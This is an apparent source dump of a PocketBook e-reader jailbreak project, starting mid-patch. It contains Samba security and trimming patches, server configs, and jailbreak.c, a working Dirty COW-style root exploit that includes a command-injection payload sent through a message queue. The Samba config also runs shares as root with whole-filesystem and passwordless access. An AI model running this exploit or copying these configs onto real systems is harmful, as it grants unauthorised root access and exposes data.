13 |
14 | --- a/source3/rpc_server/spoolss/srv_spoolss_nt.c
15 | +++ b/source3/rpc_server/spoolss/srv_spoolss_nt.c
16 | @@ -176,6 +176,11 @@ static void prune_printername_cache(void
17 | static const char *canon_servername(const char *servername)
18 | {
19 | const char *pservername = servername;
20 | +
21 | + if (servername == NULL) {
22 | + return "";
23 | + }
24 | +
25 | while (*pservername == '\\') {
26 | pservername++;
27 | }
28 | @@ -2080,6 +2085,10 @@ WERROR _spoolss_DeletePrinterDriver(stru
29 | return WERR_ACCESS_DENIED;
30 | }
31 |
32 | + if (r->in.architecture == NULL || r->in.driver == NULL) {
33 | + return WERR_INVALID_ENVIRONMENT;
34 | + }
35 | +
36 | /* check that we have a valid driver name first */
37 |
38 | if ((version = get_version_id(r->in.architecture)) == -1)
39 | @@ -2225,6 +2234,10 @@ WERROR _spoolss_DeletePrinterDriverEx(st
40 | return WERR_ACCESS_DENIED;
41 | }
42 |
43 | + if (r->in.architecture == NULL || r->in.driver == NULL) {
44 | + return WERR_INVALID_ENVIRONMENT;
45 | + }
46 | +
47 | /* check that we have a valid driver name first */
48 | if (get_version_id(r->in.architecture) == -1) {
49 | /* this is what NT returns */
50 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Use https://www.mobileread.com/forums/showthread.php?p=3921722 if you have an issue and can't narrow down proper cause/repro as other users on there may help you. Github is strictly for the technical side, not support.
2 |
3 | по русски: http://4pda.ru/forum/index.php?s=&showtopic=886480&view=findpost&p=92768601
4 |
5 | This tree uses both Pocketbook SDK for dynamic linking, as well as static musl libc cross compiler
6 | for critical services (ssh and smb). The SDK has poor portability between firmware versions, but allows
7 | for using ncurses or openssl (those are not suitable for static linking).
8 |
9 | For static musl cross compiler: https://toolchains.bootlin.com/downloads/releases/toolchains/armv7-eabihf/tarballs/armv7-eabihf--musl--stable-2018.11-1.tar.bz2
10 | For SDK cross compiler: https://github.com/ezdiy/pocketbook-sdk5/archive/master.tar.gz
11 |
12 | Unpack, and point your $PATH to 'bin' folder in both SDKs (gcc are differentiated by cross prefix, cc and cc5 in makefile).
13 |
14 | Alternatively you can use a Docker image for compiling and linking, it contains the necessary (i386) packages and the above compilers/toolchains.
15 |
16 | Requirements: [installed Docker environment](https://docs.docker.com/get-docker)
17 |
18 | To prepare the Docker image, clone this repository with its submodule(s), if you haven't yet:
19 |
20 | ```console
21 | git clone https://github.com/ezdiy/pbjb.git --recurse-submodules --shallow-submodules
22 | ```
23 |
24 | build the image:
25 | ```console
26 | cd pbjb
27 | docker build -t pbjb .
28 | ```
29 |
30 | To build pbjb, run the image (from within the same pbjb directory), this runs 'make':
31 | ```console
32 | ./rundocker.sh
33 | ```
34 |
35 | You can also specify a command to run, e.g. to run a 'make clean':
36 | ```console
37 | ./rundocker.sh make clean
38 | ```
39 |
--------------------------------------------------------------------------------
/jailbreak.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #define MSG "\xff\xff\xff\x7f\x00\x00\x00\x00\x24\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
14 | #define SU "/tmp/su"
15 | #define SUDO "/usr/bin/sudo"
16 |
17 | int stop;
18 | void *mad(void *map) {
19 | while (!stop) madvise(map, 4096, MADV_DONTNEED);
20 | return NULL;
21 | }
22 |
23 | int main(int argc, char **argv) {
24 | if (argc != 2) {
25 | printf("usage: %s [cmd]\n", argv[0]);
26 | return 0;
27 | }
28 | if (sysconf(_SC_NPROCESSORS_ONLN) == 1) {
29 | char dummy[65536];
30 | char buf[1024];
31 | int q = msgget(0xa1230f, 0);
32 | memcpy(buf, MSG, sizeof(MSG));
33 | if (msgsnd(q, buf, sizeof(MSG) + sprintf(buf + sizeof(MSG), "\";%s;\"", argv[1]) + 1, 0) == 0)
34 | msgrcv(q, dummy, 0x10000, 0x7fffffff, 0);
35 | return 0;
36 | }
37 | int sudo = open(SUDO, O_RDONLY);
38 | char *map = (char*)mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, sudo, 0);
39 | char *pp = memmem(map, 4096, "/lib", 4);
40 | pthread_t pth;
41 | if (pp != NULL) {
42 | pthread_create(&pth, NULL, &mad, map);
43 | int fd = open("/proc/self/mem", O_RDWR);
44 | char buf[4] = "/lib";
45 | for (int i = 0; (i < 10000000) && (!memcmp(buf, "/lib", 4)); i++) {
46 | pwrite(fd, SU, sizeof(SU), (off_t)(unsigned)pp);
47 | if (!(i&0xff))
48 | pread(sudo, buf, 4, pp-map);
49 | };
50 | stop = 1;
51 | pthread_join(pth, NULL);
52 | }
53 | return execl(SUDO, "/bin/sh", "/bin/sh", "-c", argv[1], NULL);
54 | }
55 |
--------------------------------------------------------------------------------
/svc/etc/lighttpd.conf:
--------------------------------------------------------------------------------
1 | server.document-root = "/mnt/ext1/public_html"
2 | include "mime.conf"
3 | dir-listing.activate = "enable"
4 | dir-listing.encoding = "utf-8"
5 | server.modules += (
6 | "mod_access",
7 | "mod_auth",
8 | "mod_authn_file",
9 | "mod_alias",
10 | "mod_indexfile",
11 | "mod_webdav",
12 | "mod_cgi",
13 | "mod_ssi",
14 | )
15 | index-file.names = ( "index.cgi", "index.shtml", "index.html", "index.htm" )
16 | ssi.extension = ( ".shtml" )
17 | cgi.assign = ( ".cgi" => "" )
18 | ssi.content-type = "text/html; charset=utf-8"
19 | alias.url = (
20 | "/public" => "/mnt/ext1/public",
21 | "/system" => "/",
22 | "/ext1" => "/mnt/ext1",
23 | "/ext2" => "/mnt/ext2",
24 | "/ext3" => "/mnt/ext3",
25 | )
26 | $HTTP["url"] =~ "^/public/" {
27 | index-file.names = ()
28 | ssi.extension = ()
29 | cgi.assign = ()
30 | webdav.activate = "enable"
31 | webdav.is-readonly = "enable"
32 | }
33 | $HTTP["url"] =~ "^/system/" {
34 | index-file.names = ()
35 | ssi.extension = ()
36 | cgi.assign = ()
37 | webdav.activate = "enable"
38 | webdav.is-readonly = "disable"
39 | auth.backend = "htdigest"
40 | auth.backend.htdigest.userfile = "/mnt/secure/etc/htdigest"
41 | auth.require = ("" => ("method"=>"digest", "realm" => "webdav", "require" => "valid-user"))
42 | }
43 | $HTTP["url"] =~ "^/ext[123]/" {
44 | index-file.names = ()
45 | ssi.extension = ()
46 | cgi.assign = ()
47 | webdav.activate = "enable"
48 | webdav.is-readonly = "disable"
49 | auth.backend = "htdigest"
50 | auth.backend.htdigest.userfile = "/mnt/secure/etc/htdigest"
51 | auth.require = ("" => ("method"=>"digest", "realm" => "webdav", "require" => "valid-user"))
52 | }
53 |
54 |
--------------------------------------------------------------------------------
/svc/etc/samba/smb.conf:
--------------------------------------------------------------------------------
1 | [global]
2 | passdb backend = smbpasswd
3 | map to guest = bad user
4 | guest account = reader
5 | security = user
6 | #log file = /tmp/samba.log
7 | #log level = 2
8 | #debug pid = yes
9 | #debug uid = yes
10 | #debug class = yes
11 | #debug hires timestamp = yes
12 | max protocol = SMB2
13 | force user = root
14 | force create mode = 0777
15 | force directory mode = 0777
16 | allow insecure wide links = yes
17 | [system]
18 | browseable = no
19 | path = /
20 | valid users = root
21 | writable = yes
22 | comment = Whole system view (careful!)
23 | follow symlinks = yes
24 | wide links = yes
25 | [public]
26 | browseable = yes
27 | path = /mnt/ext1/public
28 | guest ok = yes
29 | valid users = reader, root
30 | comment = Guest view of /public folder in main storage
31 | writable = no
32 | [ext1]
33 | public = no
34 | path = /mnt/ext1
35 | browseable = yes
36 | writable = yes
37 | valid users = root
38 | comment = Built in storage of the reader
39 | [ext2]
40 | public = no
41 | path = /mnt/ext2
42 | browseable = yes
43 | writable = yes
44 | valid users = root
45 | comment = SD card 1 (if there is any)
46 | [ext3]
47 | public = no
48 | path = /mnt/ext3
49 | browseable = yes
50 | writable = yes
51 | valid users = root
52 | comment = SD card 2 (if there is any)
53 |
54 | [uext1]
55 | public = yes
56 | path = /mnt/ext1
57 | browseable = yes
58 | writable = yes
59 | valid users = reader, root
60 | comment = No password (USBNet only)
61 | hosts deny = ALL
62 | hosts allow = 169.254.
63 | [uext2]
64 | public = yes
65 | path = /mnt/ext2
66 | browseable = yes
67 | writable = yes
68 | valid users = reader, root
69 | comment = No password (USBNet only)
70 | hosts deny = ALL
71 | hosts allow = 169.254.
72 | [uext3]
73 | public = yes
74 | path = /mnt/ext3
75 | browseable = yes
76 | writable = yes
77 | valid users = reader, root
78 | comment = No password (USBNet only)
79 | hosts deny = ALL
80 | hosts allow = 169.254.
81 |
82 |
--------------------------------------------------------------------------------
/samba-patches/240-remove_dfs_api.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/rpc_server/rpc_ep_setup.c
2 | +++ b/source3/rpc_server/rpc_ep_setup.c
3 | @@ -881,6 +881,7 @@ static bool rpcecho_init_cb(void *ptr) {
4 |
5 | #endif
6 |
7 | +#ifdef DFS_SUPPORT
8 | static bool netdfs_init_cb(void *ptr)
9 | {
10 | struct dcesrv_ep_context *ep_ctx =
11 | @@ -928,6 +929,7 @@ static bool netdfs_init_cb(void *ptr)
12 |
13 | return true;
14 | }
15 | +#endif
16 |
17 | #ifdef ACTIVE_DIRECTORY
18 | static bool dssetup_init_cb(void *ptr)
19 | @@ -1173,12 +1175,14 @@ bool dcesrv_ep_setup(struct tevent_conte
20 | return false;
21 | }
22 |
23 | +#ifdef DFS_SUPPORT
24 | netdfs_cb.init = netdfs_init_cb;
25 | netdfs_cb.shutdown = NULL;
26 | netdfs_cb.private_data = ep_ctx;
27 | if (!NT_STATUS_IS_OK(rpc_netdfs_init(&netdfs_cb))) {
28 | return false;
29 | }
30 | +#endif
31 |
32 | #ifdef DEVELOPER
33 | rpcecho_cb.init = rpcecho_init_cb;
34 | --- a/source3/librpc/rpc/rpc_common.c
35 | +++ b/source3/librpc/rpc/rpc_common.c
36 | @@ -122,9 +122,11 @@ static bool initialize_interfaces(void)
37 | return false;
38 | }
39 | #endif
40 | +#ifdef DFS_SUPPORT
41 | if (!smb_register_ndr_interface(&ndr_table_netdfs)) {
42 | return false;
43 | }
44 | +#endif
45 | #ifdef DEVELOPER
46 | if (!smb_register_ndr_interface(&ndr_table_rpcecho)) {
47 | return false;
48 | --- a/source3/smbd/server_exit.c
49 | +++ b/source3/smbd/server_exit.c
50 | @@ -138,7 +138,9 @@ static void exit_server_common(enum serv
51 | #ifdef DEVELOPER
52 | rpc_rpcecho_shutdown();
53 | #endif
54 | +#ifdef DFS_SUPPORT
55 | rpc_netdfs_shutdown();
56 | +#endif
57 | rpc_initshutdown_shutdown();
58 | #ifdef EXTRA_SERVICES
59 | rpc_eventlog_shutdown();
60 | --- a/source3/rpcclient/rpcclient.c
61 | +++ b/source3/rpcclient/rpcclient.c
62 | @@ -629,7 +629,9 @@ static struct cmd_set *rpcclient_command
63 | #endif
64 | netlogon_commands,
65 | srvsvc_commands,
66 | +#ifdef DFS_SUPPORT
67 | dfs_commands,
68 | +#endif
69 | #ifdef DEVELOPER
70 | echo_commands,
71 | #endif
72 |
--------------------------------------------------------------------------------
/samba-patches/290-remove_lsa.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/librpc/rpc/rpc_common.c
2 | +++ b/source3/librpc/rpc/rpc_common.c
3 | @@ -92,9 +92,11 @@ bool smb_register_ndr_interface(const st
4 |
5 | static bool initialize_interfaces(void)
6 | {
7 | +#ifdef LSA_SUPPORT
8 | if (!smb_register_ndr_interface(&ndr_table_lsarpc)) {
9 | return false;
10 | }
11 | +#endif
12 | #ifdef ACTIVE_DIRECTORY
13 | if (!smb_register_ndr_interface(&ndr_table_dssetup)) {
14 | return false;
15 | --- a/source3/smbd/server_exit.c
16 | +++ b/source3/smbd/server_exit.c
17 | @@ -162,7 +162,9 @@ static void exit_server_common(enum serv
18 | #ifdef SAMR_SUPPORT
19 | rpc_samr_shutdown();
20 | #endif
21 | +#ifdef LSA_SUPPORT
22 | rpc_lsarpc_shutdown();
23 | +#endif
24 | }
25 |
26 | /*
27 | --- a/source3/rpc_server/rpc_ep_setup.c
28 | +++ b/source3/rpc_server/rpc_ep_setup.c
29 | @@ -508,6 +508,7 @@ static bool srvsvc_init_cb(void *ptr)
30 | return true;
31 | }
32 |
33 | +#ifdef LSA_SUPPORT
34 | static bool lsarpc_init_cb(void *ptr)
35 | {
36 | struct dcesrv_ep_context *ep_ctx =
37 | @@ -556,6 +557,7 @@ static bool lsarpc_init_cb(void *ptr)
38 |
39 | return true;
40 | }
41 | +#endif
42 |
43 | #ifdef SAMR_SUPPORT
44 | static bool samr_init_cb(void *ptr)
45 | @@ -1106,12 +1108,14 @@ bool dcesrv_ep_setup(struct tevent_conte
46 | }
47 |
48 |
49 | +#ifdef LSA_SUPPORT
50 | lsarpc_cb.init = lsarpc_init_cb;
51 | lsarpc_cb.shutdown = NULL;
52 | lsarpc_cb.private_data = ep_ctx;
53 | if (!NT_STATUS_IS_OK(rpc_lsarpc_init(&lsarpc_cb))) {
54 | return false;
55 | }
56 | +#endif
57 |
58 | #ifdef SAMR_SUPPORT
59 | samr_cb.init = samr_init_cb;
60 | --- a/source3/rpc_server/rpc_handles.c
61 | +++ b/source3/rpc_server/rpc_handles.c
62 | @@ -63,7 +63,10 @@ static bool is_samr_lsa_pipe(const struc
63 | #ifdef SAMR_SUPPORT
64 | ndr_syntax_id_equal(syntax, &ndr_table_samr.syntax_id) ||
65 | #endif
66 | - ndr_syntax_id_equal(syntax, &ndr_table_lsarpc.syntax_id);
67 | +#ifdef LSA_SUPPORT
68 | + ndr_syntax_id_equal(syntax, &ndr_table_lsarpc.syntax_id) ||
69 | +#endif
70 | + false;
71 | }
72 |
73 | size_t num_pipe_handles(struct pipes_struct *p)
74 | --- a/source3/rpc_server/srv_pipe.c
75 | +++ b/source3/rpc_server/srv_pipe.c
76 | @@ -419,10 +419,12 @@ static bool check_bind_req(struct pipes_
77 | context_fns->allow_connect = false;
78 | }
79 | #endif
80 | +#ifdef LSA_SUPPORT
81 | ok = ndr_syntax_id_equal(abstract, &ndr_table_lsarpc.syntax_id);
82 | if (ok) {
83 | context_fns->allow_connect = false;
84 | }
85 | +#endif
86 | #ifdef NETLOGON_SUPPORT
87 | ok = ndr_syntax_id_equal(abstract, &ndr_table_netlogon.syntax_id);
88 | if (ok) {
89 |
--------------------------------------------------------------------------------
/samba-patches/028-CVE-2016-2125-v3.6.patch:
--------------------------------------------------------------------------------
1 | From: =?utf-8?q?Guido_G=C3=BCnther?=
2 | Date: Wed, 28 Dec 2016 19:21:49 +0100
3 | Subject: security-CVE-2016-2125: Don't pass GSS_C_DELEG_FLAG by default
4 |
5 | This is a backport of upstream commits
6 |
7 | b1a056f77e793efc45df34ab7bf78fbec1bf8a59
8 | b83897ae49fdee1fda73c10c7fe73362bfaba690 (code not used in wheezy)
9 | 3106964a640ddf6a3c08c634ff586a814f94dff8 (code not used in wheezy)
10 | ---
11 | source3/librpc/crypto/gse.c | 1 -
12 | source3/libsmb/clifsinfo.c | 2 +-
13 | source4/auth/gensec/gensec_gssapi.c | 2 +-
14 | source4/scripting/bin/nsupdate-gss | 2 +-
15 | 4 files changed, 3 insertions(+), 4 deletions(-)
16 |
17 | --- a/source3/librpc/crypto/gse.c
18 | +++ b/source3/librpc/crypto/gse.c
19 | @@ -162,7 +162,6 @@ static NTSTATUS gse_context_init(TALLOC_
20 | memcpy(&gse_ctx->gss_mech, gss_mech_krb5, sizeof(gss_OID_desc));
21 |
22 | gse_ctx->gss_c_flags = GSS_C_MUTUAL_FLAG |
23 | - GSS_C_DELEG_FLAG |
24 | GSS_C_DELEG_POLICY_FLAG |
25 | GSS_C_REPLAY_FLAG |
26 | GSS_C_SEQUENCE_FLAG;
27 | --- a/source3/libsmb/clifsinfo.c
28 | +++ b/source3/libsmb/clifsinfo.c
29 | @@ -726,7 +726,7 @@ static NTSTATUS make_cli_gss_blob(TALLOC
30 | &es->s.gss_state->gss_ctx,
31 | srv_name,
32 | GSS_C_NO_OID, /* default OID. */
33 | - GSS_C_MUTUAL_FLAG | GSS_C_REPLAY_FLAG | GSS_C_SEQUENCE_FLAG | GSS_C_DELEG_FLAG,
34 | + GSS_C_MUTUAL_FLAG | GSS_C_REPLAY_FLAG | GSS_C_SEQUENCE_FLAG | GSS_C_DELEG_POLICY_FLAG,
35 | GSS_C_INDEFINITE, /* requested ticket lifetime. */
36 | NULL, /* no channel bindings */
37 | p_tok_in,
38 | --- a/source4/auth/gensec/gensec_gssapi.c
39 | +++ b/source4/auth/gensec/gensec_gssapi.c
40 | @@ -172,7 +172,7 @@ static NTSTATUS gensec_gssapi_start(stru
41 | if (gensec_setting_bool(gensec_security->settings, "gensec_gssapi", "mutual", true)) {
42 | gensec_gssapi_state->want_flags |= GSS_C_MUTUAL_FLAG;
43 | }
44 | - if (gensec_setting_bool(gensec_security->settings, "gensec_gssapi", "delegation", true)) {
45 | + if (gensec_setting_bool(gensec_security->settings, "gensec_gssapi", "delegation", false)) {
46 | gensec_gssapi_state->want_flags |= GSS_C_DELEG_FLAG;
47 | }
48 | if (gensec_setting_bool(gensec_security->settings, "gensec_gssapi", "replay", true)) {
49 | --- a/source4/scripting/bin/nsupdate-gss
50 | +++ b/source4/scripting/bin/nsupdate-gss
51 | @@ -178,7 +178,7 @@ sub negotiate_tkey($$$$)
52 | my $flags =
53 | GSS_C_REPLAY_FLAG | GSS_C_MUTUAL_FLAG |
54 | GSS_C_SEQUENCE_FLAG | GSS_C_CONF_FLAG |
55 | - GSS_C_INTEG_FLAG | GSS_C_DELEG_FLAG;
56 | + GSS_C_INTEG_FLAG;
57 |
58 |
59 | $status = GSSAPI::Cred::acquire_cred(undef, 120, undef, GSS_C_INITIATE,
60 |
--------------------------------------------------------------------------------
/samba-patches/210-remove_ad_support.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/librpc/rpc/rpc_common.c
2 | +++ b/source3/librpc/rpc/rpc_common.c
3 | @@ -95,9 +95,11 @@ static bool initialize_interfaces(void)
4 | if (!smb_register_ndr_interface(&ndr_table_lsarpc)) {
5 | return false;
6 | }
7 | +#ifdef ACTIVE_DIRECTORY
8 | if (!smb_register_ndr_interface(&ndr_table_dssetup)) {
9 | return false;
10 | }
11 | +#endif
12 | if (!smb_register_ndr_interface(&ndr_table_samr)) {
13 | return false;
14 | }
15 | @@ -141,9 +143,11 @@ static bool initialize_interfaces(void)
16 | if (!smb_register_ndr_interface(&ndr_table_epmapper)) {
17 | return false;
18 | }
19 | +#ifdef ACTIVE_DIRECTORY
20 | if (!smb_register_ndr_interface(&ndr_table_drsuapi)) {
21 | return false;
22 | }
23 | +#endif
24 | return true;
25 | }
26 |
27 | --- a/source3/rpc_server/rpc_ep_setup.c
28 | +++ b/source3/rpc_server/rpc_ep_setup.c
29 | @@ -918,6 +918,7 @@ static bool netdfs_init_cb(void *ptr)
30 | return true;
31 | }
32 |
33 | +#ifdef ACTIVE_DIRECTORY
34 | static bool dssetup_init_cb(void *ptr)
35 | {
36 | struct dcesrv_ep_context *ep_ctx =
37 | @@ -966,6 +967,7 @@ static bool dssetup_init_cb(void *ptr)
38 |
39 | return true;
40 | }
41 | +#endif
42 |
43 | static bool wkssvc_init_cb(void *ptr)
44 | {
45 | @@ -1172,12 +1174,14 @@ bool dcesrv_ep_setup(struct tevent_conte
46 | }
47 | #endif
48 |
49 | +#ifdef ACTIVE_DIRECTORY
50 | dssetup_cb.init = dssetup_init_cb;
51 | dssetup_cb.shutdown = NULL;
52 | dssetup_cb.private_data = ep_ctx;
53 | if (!NT_STATUS_IS_OK(rpc_dssetup_init(&dssetup_cb))) {
54 | return false;
55 | }
56 | +#endif
57 |
58 | wkssvc_cb.init = wkssvc_init_cb;
59 | wkssvc_cb.shutdown = NULL;
60 | --- a/source3/smbd/server_exit.c
61 | +++ b/source3/smbd/server_exit.c
62 | @@ -132,7 +132,9 @@ static void exit_server_common(enum serv
63 |
64 | if (am_parent) {
65 | rpc_wkssvc_shutdown();
66 | +#ifdef ACTIVE_DIRECTORY
67 | rpc_dssetup_shutdown();
68 | +#endif
69 | #ifdef DEVELOPER
70 | rpc_rpcecho_shutdown();
71 | #endif
72 | --- a/source3/rpc_client/cli_pipe.c
73 | +++ b/source3/rpc_client/cli_pipe.c
74 | @@ -3391,12 +3391,14 @@ NTSTATUS cli_rpc_pipe_open_noauth_transp
75 | status = rpc_pipe_bind(result, auth);
76 | if (!NT_STATUS_IS_OK(status)) {
77 | int lvl = 0;
78 | +#ifdef ACTIVE_DIRECTORY
79 | if (ndr_syntax_id_equal(interface,
80 | &ndr_table_dssetup.syntax_id)) {
81 | /* non AD domains just don't have this pipe, avoid
82 | * level 0 statement in that case - gd */
83 | lvl = 3;
84 | }
85 | +#endif
86 | DEBUG(lvl, ("cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe "
87 | "%s failed with error %s\n",
88 | get_pipe_name_from_syntax(talloc_tos(), interface),
89 |
--------------------------------------------------------------------------------
/samba-patches/032-CVE-2017-12150-v3.6.patch:
--------------------------------------------------------------------------------
1 | From: =?utf-8?q?Guido_G=C3=BCnther?=
2 | Date: Wed, 20 Sep 2017 20:01:34 +0200
3 | Subject: CVE-2017-12150
4 |
5 | These are the three upstream patches
6 |
7 | From: Stefan Metzmacher
8 | Subject: CVE-2017-12150: s3:lib: get_cmdline_auth_info_signing_state use Required for smb_encrypt
9 |
10 | This is an addition to the fixes for CVE-2015-5296.
11 |
12 | It applies to smb2mount -e, smbcacls -e and smbcquotas -e.
13 |
14 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=12997
15 |
16 |
17 | From: Stefan Metzmacher
18 | Subject: CVE-2017-12150: libgpo: make use of Required for SMB signing in gpo_connect_server()
19 |
20 | It's important that we use a signed connection to get the GPOs!
21 |
22 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=12997
23 |
24 | Signed-off-by: Stefan Metzmacher
25 | Backported-by: Andreas Schneider
26 |
27 |
28 | From: Stefan Metzmacher
29 | Subject: CVE-2017-12150: s3:libsmb: only fallback to anonymous if authentication was not requested
30 |
31 | With forced encryption or required signing we should also don't fallback.
32 |
33 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=12997
34 |
35 | ---
36 | libgpo/gpo_fetch.c | 2 +-
37 | source3/lib/util_cmdline.c | 3 +++
38 | source3/libsmb/clidfs.c | 2 ++
39 | 3 files changed, 6 insertions(+), 1 deletion(-)
40 |
41 | --- a/libgpo/gpo_fetch.c
42 | +++ b/libgpo/gpo_fetch.c
43 | @@ -151,7 +151,7 @@ static NTSTATUS gpo_connect_server(ADS_S
44 | ads->auth.password,
45 | CLI_FULL_CONNECTION_USE_KERBEROS |
46 | CLI_FULL_CONNECTION_FALLBACK_AFTER_KERBEROS,
47 | - Undefined);
48 | + Required);
49 | if (!NT_STATUS_IS_OK(result)) {
50 | DEBUG(10,("check_refresh_gpo: "
51 | "failed to connect: %s\n",
52 | --- a/source3/lib/util_cmdline.c
53 | +++ b/source3/lib/util_cmdline.c
54 | @@ -122,6 +122,9 @@ bool set_cmdline_auth_info_signing_state
55 |
56 | int get_cmdline_auth_info_signing_state(const struct user_auth_info *auth_info)
57 | {
58 | + if (auth_info->smb_encrypt) {
59 | + return Required;
60 | + }
61 | return auth_info->signing_state;
62 | }
63 |
64 | --- a/source3/libsmb/clidfs.c
65 | +++ b/source3/libsmb/clidfs.c
66 | @@ -202,7 +202,9 @@ static struct cli_state *do_connect(TALL
67 | /* If a password was not supplied then
68 | * try again with a null username. */
69 | if (password[0] || !username[0] ||
70 | + force_encrypt || client_is_signing_mandatory(c) ||
71 | get_cmdline_auth_info_use_kerberos(auth_info) ||
72 | + get_cmdline_auth_info_use_ccache(auth_info) ||
73 | !NT_STATUS_IS_OK(cli_session_setup(c, "",
74 | "", 0,
75 | "", 0,
76 |
--------------------------------------------------------------------------------
/samba-patches/220-remove_services.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/librpc/rpc/rpc_common.c
2 | +++ b/source3/librpc/rpc/rpc_common.c
3 | @@ -131,6 +131,7 @@ static bool initialize_interfaces(void)
4 | if (!smb_register_ndr_interface(&ndr_table_initshutdown)) {
5 | return false;
6 | }
7 | +#ifdef EXTRA_SERVICES
8 | if (!smb_register_ndr_interface(&ndr_table_svcctl)) {
9 | return false;
10 | }
11 | @@ -140,6 +141,7 @@ static bool initialize_interfaces(void)
12 | if (!smb_register_ndr_interface(&ndr_table_ntsvcs)) {
13 | return false;
14 | }
15 | +#endif
16 | if (!smb_register_ndr_interface(&ndr_table_epmapper)) {
17 | return false;
18 | }
19 | --- a/source3/rpc_server/rpc_ep_setup.c
20 | +++ b/source3/rpc_server/rpc_ep_setup.c
21 | @@ -697,6 +697,7 @@ static bool spoolss_shutdown_cb(void *pt
22 | return true;
23 | }
24 |
25 | +#ifdef EXTRA_SERVICES
26 | static bool svcctl_init_cb(void *ptr)
27 | {
28 | struct dcesrv_ep_context *ep_ctx =
29 | @@ -733,6 +734,7 @@ static bool svcctl_init_cb(void *ptr)
30 |
31 | return true;
32 | }
33 | +#endif
34 |
35 | static bool svcctl_shutdown_cb(void *ptr)
36 | {
37 | @@ -741,6 +743,8 @@ static bool svcctl_shutdown_cb(void *ptr
38 | return true;
39 | }
40 |
41 | +#ifdef EXTRA_SERVICES
42 | +
43 | static bool ntsvcs_init_cb(void *ptr)
44 | {
45 | struct dcesrv_ep_context *ep_ctx =
46 | @@ -802,6 +806,7 @@ static bool eventlog_init_cb(void *ptr)
47 |
48 | return true;
49 | }
50 | +#endif
51 |
52 | static bool initshutdown_init_cb(void *ptr)
53 | {
54 | @@ -1130,6 +1135,7 @@ bool dcesrv_ep_setup(struct tevent_conte
55 | }
56 | }
57 |
58 | +#ifdef EXTRA_SERVICES
59 | svcctl_cb.init = svcctl_init_cb;
60 | svcctl_cb.shutdown = svcctl_shutdown_cb;
61 | svcctl_cb.private_data = ep_ctx;
62 | @@ -1150,6 +1156,7 @@ bool dcesrv_ep_setup(struct tevent_conte
63 | if (!NT_STATUS_IS_OK(rpc_eventlog_init(&eventlog_cb))) {
64 | return false;
65 | }
66 | +#endif
67 |
68 | initshutdown_cb.init = initshutdown_init_cb;
69 | initshutdown_cb.shutdown = NULL;
70 | --- a/source3/smbd/server_exit.c
71 | +++ b/source3/smbd/server_exit.c
72 | @@ -140,9 +140,11 @@ static void exit_server_common(enum serv
73 | #endif
74 | rpc_netdfs_shutdown();
75 | rpc_initshutdown_shutdown();
76 | +#ifdef EXTRA_SERVICES
77 | rpc_eventlog_shutdown();
78 | - rpc_ntsvcs_shutdown();
79 | rpc_svcctl_shutdown();
80 | + rpc_ntsvcs_shutdown();
81 | +#endif
82 | #ifdef PRINTER_SUPPORT
83 | rpc_spoolss_shutdown();
84 | #endif
85 | --- a/source3/rpcclient/rpcclient.c
86 | +++ b/source3/rpcclient/rpcclient.c
87 | @@ -637,9 +637,11 @@ static struct cmd_set *rpcclient_command
88 | shutdown_commands,
89 | test_commands,
90 | wkssvc_commands,
91 | +#ifdef EXTRA_SERVICES
92 | ntsvcs_commands,
93 | drsuapi_commands,
94 | eventlog_commands,
95 | +#endif
96 | winreg_commands,
97 | NULL
98 | };
99 |
--------------------------------------------------------------------------------
/samba-patches/012-patch-cve-2015-5299.patch:
--------------------------------------------------------------------------------
1 | From 8e49de7754f7171a58a1f94dee0f1138dbee3c60 Mon Sep 17 00:00:00 2001
2 | From: Jeremy Allison
3 | Date: Fri, 23 Oct 2015 14:54:31 -0700
4 | Subject: [PATCH] CVE-2015-5299: s3-shadow-copy2: fix missing access check on
5 | snapdir
6 |
7 | Fix originally from
8 |
9 | https://bugzilla.samba.org/show_bug.cgi?id=11529
10 |
11 | Signed-off-by: Jeremy Allison
12 | Reviewed-by: David Disseldorp
13 | ---
14 | source3/modules/vfs_shadow_copy2.c | 47 ++++++++++++++++++++++++++++++++++++++
15 | 1 file changed, 47 insertions(+)
16 |
17 | --- a/source3/modules/vfs_shadow_copy2.c
18 | +++ b/source3/modules/vfs_shadow_copy2.c
19 | @@ -21,6 +21,8 @@
20 |
21 | #include "includes.h"
22 | #include "smbd/smbd.h"
23 | +#include "smbd/globals.h"
24 | +#include "../libcli/security/security.h"
25 | #include "system/filesys.h"
26 | #include "ntioctl.h"
27 |
28 | @@ -764,6 +766,43 @@ static int shadow_copy2_mkdir(vfs_handle
29 | SHADOW2_NEXT(MKDIR, (handle, name, mode), int, -1);
30 | }
31 |
32 | +static bool check_access_snapdir(struct vfs_handle_struct *handle,
33 | + const char *path)
34 | +{
35 | + struct smb_filename smb_fname;
36 | + int ret;
37 | + NTSTATUS status;
38 | + uint32_t access_granted = 0;
39 | +
40 | + ZERO_STRUCT(smb_fname);
41 | + smb_fname.base_name = talloc_asprintf(talloc_tos(),
42 | + "%s",
43 | + path);
44 | + if (smb_fname.base_name == NULL) {
45 | + return false;
46 | + }
47 | +
48 | + ret = SMB_VFS_NEXT_STAT(handle, &smb_fname);
49 | + if (ret != 0 || !S_ISDIR(smb_fname.st.st_ex_mode)) {
50 | + TALLOC_FREE(smb_fname.base_name);
51 | + return false;
52 | + }
53 | +
54 | + status = smbd_check_open_rights(handle->conn,
55 | + &smb_fname,
56 | + SEC_DIR_LIST,
57 | + &access_granted);
58 | + if (!NT_STATUS_IS_OK(status)) {
59 | + DEBUG(0,("user does not have list permission "
60 | + "on snapdir %s\n",
61 | + smb_fname.base_name));
62 | + TALLOC_FREE(smb_fname.base_name);
63 | + return false;
64 | + }
65 | + TALLOC_FREE(smb_fname.base_name);
66 | + return true;
67 | +}
68 | +
69 | static int shadow_copy2_rmdir(vfs_handle_struct *handle, const char *fname)
70 | {
